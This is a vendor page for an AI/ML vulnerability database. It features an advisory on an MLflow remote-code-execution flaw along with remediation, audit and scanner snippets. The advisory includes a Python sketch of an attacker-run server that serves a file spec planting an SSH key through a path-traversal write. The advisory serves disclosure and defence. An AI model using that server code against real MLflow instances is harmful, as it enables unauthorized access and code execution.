81 new vulnerabilities published

The First AI/ML Supply Chain Vulnerability Database

Detect, assess, and remediate vulnerabilities in your AI/ML supply chain with detailed descriptions & infographics, automated vulnerability scanners, and OSS maintainer-provided fixes & remediation advice.

Vulnerabilities in PyPI, MLflow, and MLOps

AI vulnerabilities that are Actually Impactful

Assess whether a concern is a legitimate threat to your organization with our detailed report analysis, attack scenarios and attack path diagrams. We curate our vulnerability feed to highlight security issues that have real-world impacts on AI applications and ML systems.

Available publicly on Nov 16, 2023

mlflow

Remote Code Execution via Controlled File Write

Severity: 10 (Critical)

Threat overview

The vulnerability stems from the way MLflow processes model source URLs. Specifically, when a model is created with a source URL pointing to another model that, in turn, points to a malicious server, MLflow fetches and writes files as specified by the attacker. This behavior can be exploited to write arbitrary files on the system, leading to remote code execution. The lack of authentication by default and the ability to control the file path and content through a malicious server are key factors that facilitate this exploit.

Attack Scenario

An attacker sets up a malicious server to serve a JSON response that specifies a file path and content. The attacker then creates two models in MLflow: the first model's source points to the malicious server, and the second model's source points to the first model. When MLflow processes the second model, it fetches the file specification from the malicious server and writes the specified file to the system, allowing the attacker to execute arbitrary code.
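
To make the chain concrete, here is a minimal Python sketch of the attacker-controlled server in this scenario. The JSON field names ("path", "contents"), the example payload, and the port are illustrative assumptions rather than the exact specification format MLflow parses; the point is that the server, not MLflow, dictates where the file lands and what it contains.

    import json
    from http.server import BaseHTTPRequestHandler, HTTPServer

    # Attacker-controlled file specification. Field names are
    # illustrative placeholders, not the exact schema MLflow parses.
    FILE_SPEC = {
        "path": "../../.ssh/authorized_keys",  # attacker-chosen write location
        "contents": "ssh-ed25519 AAAA... attacker@evil",
    }

    class MaliciousHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            # Serve the file specification to any client that asks.
            body = json.dumps(FILE_SPEC).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    if __name__ == "__main__":
        # The first MLflow model's source URL points at this server;
        # a second model's source then points at the first model.
        HTTPServer(("0.0.0.0", 8000), MaliciousHandler).serve_forever()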

Who is affected?

Any user or organization running MLflow versions 2.6.0 to 2.9.1 with default configurations is vulnerable to this attack. The vulnerability specifically affects environments where MLflow is used for tracking experiments, packaging code, and sharing and deploying models without requiring authentication.

Remediation that you can rely on

Remediate any vulnerability you face with maintainer-curated fixes and AI application-specific remediation advice. We work directly with the open source community to identify and remediate OSS vulnerabilities that affect AI applications and ML systems.

  1. Update MLflow to version 2.9.2 or later.
  2. Ensure that authentication is enabled for MLflow to prevent unauthorized access.
  3. Regularly review and monitor model creation requests to detect any suspicious activity (a starting point is sketched after this list).
  4. Consider implementing network-level controls to restrict access to the MLflow server from untrusted sources.
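
As a starting point for step 3, the sketch below uses the MLflow Python client to enumerate registered model versions and flag sources that point at an external server or at another registered model, the two ingredients of the attack chain described above. It assumes a recent MLflow 2.x client; the tracking URI and prefix heuristics are assumptions to adapt to your environment, not an official detection rule.

    from mlflow.tracking import MlflowClient

    # Prefixes worth flagging: external servers and model-to-model
    # sources. These heuristics are illustrative only.
    SUSPICIOUS_PREFIXES = ("http://", "https://", "models:/")

    def audit_model_sources(tracking_uri: str) -> None:
        client = MlflowClient(tracking_uri=tracking_uri)
        for mv in client.search_model_versions():
            source = mv.source or ""
            if source.startswith(SUSPICIOUS_PREFIXES):
                print(f"[!] {mv.name} v{mv.version}: suspicious source {source}")

    if __name__ == "__main__":
        # Placeholder tracking URI; point this at your MLflow server.
        audit_model_sources("http://localhost:5000")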

Automated Vulnerability Scanners

Detect vulnerable services in your network by leveraging Nuclei templates to quickly evaluate your attack surface.
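
As one way to put a template to work, the following sketch drives the nuclei CLI from Python. It assumes the nuclei binary is on your PATH and that a template has been saved locally; the target URL and template filename are placeholders.

    import subprocess

    def run_nuclei(target: str, template: str) -> str:
        # -u sets the target, -t selects the template file,
        # -silent limits output to findings only.
        result = subprocess.run(
            ["nuclei", "-u", target, "-t", template, "-silent"],
            capture_output=True,
            text=True,
            check=False,
        )
        return result.stdout

    if __name__ == "__main__":
        # Placeholder target and template filename.
        findings = run_nuclei("https://mlflow.internal.example", "mlflow-rce.yaml")
        print(findings or "no findings")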


Sightline Premium

Early Access

Get early access to fixed vulnerabilities before they're publicly disclosed. On average, customers get a 31-day early warning before a vulnerability becomes public.

Protect AI Platform Integration

Immediately see which vulnerabilities matter most by combining the context of your AI application's MLBOM (provided by Radar) with Sightline.

Unlimited Access to Scanners

Leverage our Scanners immediately as they're released on Sightline Premium, instead of waiting for them to eventually get into the public Vulnerability Feed.

API Access

Integrate our Vulnerability Feed into your existing workflows and tools by leveraging our API, built on the OpenSSF's Open Source Vulnerability (OSV) standard.
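
For illustration, the snippet below pulls entries from an OSV-format feed and prints a one-line summary of each. The endpoint URL and bearer-token authentication are hypothetical placeholders; the fields it reads (id, summary, affected) are standard OSV schema fields.

    import requests

    # Hypothetical feed endpoint; substitute the real API URL and key.
    FEED_URL = "https://api.example.com/v1/vulns"

    def fetch_osv_entries(api_key: str) -> list[dict]:
        resp = requests.get(
            FEED_URL,
            headers={"Authorization": f"Bearer {api_key}"},
            timeout=30,
        )
        resp.raise_for_status()
        return resp.json()

    def summarize(entry: dict) -> str:
        # "id", "summary", and "affected" are standard OSV fields.
        packages = [a["package"]["name"] for a in entry.get("affected", [])]
        return f'{entry["id"]}: {entry.get("summary", "")} ({", ".join(packages)})'

    if __name__ == "__main__":
        for entry in fetch_osv_entries("YOUR_API_KEY"):
            print(summarize(entry))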

Many eyes make all bugs shallow

Sightline is powered by our Huntr community, the world's first bug bounty board for AI/ML.
Together, we have helped protect AI by working with over 15k security researchers and maintainers, who have earned over $500k finding & fixing vulnerabilities.

171 vulnerabilities identified in the last 90 days

56 vulnerabilities that are not yet public

35 average days of early access for customers

Learn more about Huntr